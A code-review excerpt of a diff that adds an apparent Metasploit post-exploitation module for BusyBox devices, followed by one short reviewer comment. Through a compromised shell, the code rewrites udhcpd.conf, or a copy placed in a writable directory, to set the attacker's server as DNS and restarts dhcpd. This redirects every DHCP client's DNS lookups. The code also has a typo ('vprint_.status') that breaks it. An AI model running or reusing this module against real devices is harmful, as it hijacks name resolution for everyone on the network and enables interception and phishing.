modules/post/linux/manage/busybox_setdns.rb

```diff
@@ -0,0 +1,124 @@
+      original_content = read_file("/etc/udhcpd.conf")
+      vprint_status("Original udhcpd.conf content:")
+      vprint_status(original_content)
+      if is_writable_and_write("/etc/udhcpd.conf", "option dns #{datastore['SRVHOST']}", false)
+        vprint_status("Udhcpd.conf is writable.")
+        is_writable_and_write("/etc/udhcpd.conf", original_content, true)
+        vprint_status("Relaunching udhcp server:")
+        cmd_exec("killall dhcpd\n")
+        cmd_exec("dhcpd /etc/udhcpd.conf &\n")
+        print_good("Udhcpd.conf modified and dns server added. Dhcpd restarted.")
+      else
+        vprint_status("Unable to write udhcpd.conf. Trying to copy the file to a writable directory.")
+        writable_directory = nil
+        vprint_.status("Trying to find writable directory.")
+        writable_directory = "/etc/" if is_writable_and_write("/etc/tmp.conf", "x", false)
+        writable_directory = "/mnt/" if (!writable_directory && is_writable_and_write("/mnt/tmp.conf", "x", false))
+        writable_directory = "/var/" if (!writable_directory && is_writable_and_write("/var/tmp.conf", "x", false))
+        writable_directory = "/var/tmp/" if (!writable_directory && is_writable_and_write("/var/tmp/tmp.conf", "x", false))
+        if writable_directory
+          vprint_status("writable directory found, creating a copy of the original udhcpd.conf.")
+          is_writable_and_write("#{writable_directory}tmp.conf", "option dns #{datastore['SRVHOST']}", false)
+          is_writable_and_write("#{writable_directory}tmp.conf", original_content, true)
+          vprint_status("Relaunching udhcp server:")
+          cmd_exec("killall dhcpd\n")
+          cmd_exec("dhcpd #{writable_directory}tmp.conf &\n")
+          print_good("Udhcpd.conf copied to writable directory and dns server added. Dhcpd restarted.")
+          workdone = true
+        else
+          vprint_error("Writable directory not found.")
+        end
+      end
+    end
+    if !workdone
+      print_error("Unable to modify dns server.")
+    end
+
+  end
+
+  #This function checks if the target file is writable and writes or append the data given as parameter.
+  #BusyBox shell's commands are limited and Msf > Post > File > write_file function doesnt work here, for
+  #this reason it is necessary to implement an specific function
+
+  def is_writable_and_write(file_path, data, append)
+    if append
+      data = read_file(file_path) + "\n" + data
+    end
+    rand_str = ""; 16.times{rand_str  << (65 + rand(25)).chr}
+    session.shell_write("echo #{rand_str} > #{file_path}\n"); Rex::sleep(0.1)
+    session.shell_read(); Rex::sleep(0.1)
+    if read_file(file_path).include? rand_str
+      session.shell_write("echo \"\"> #{file_path}\n"); Rex::sleep(0.1)
+      session.shell_read(); Rex::sleep(0.1)
+      lines = data.lines.map(&:chomp)
+      lines.each do |line|
+        session.shell_write("echo #{line.chomp} >> #{file_path}\n"); Rex::sleep(0.1)
```

Comment:
Ideally cmd_exec should be used. If it is not used because of Firefox, do you mind to share details about the problems you're using here? thanks!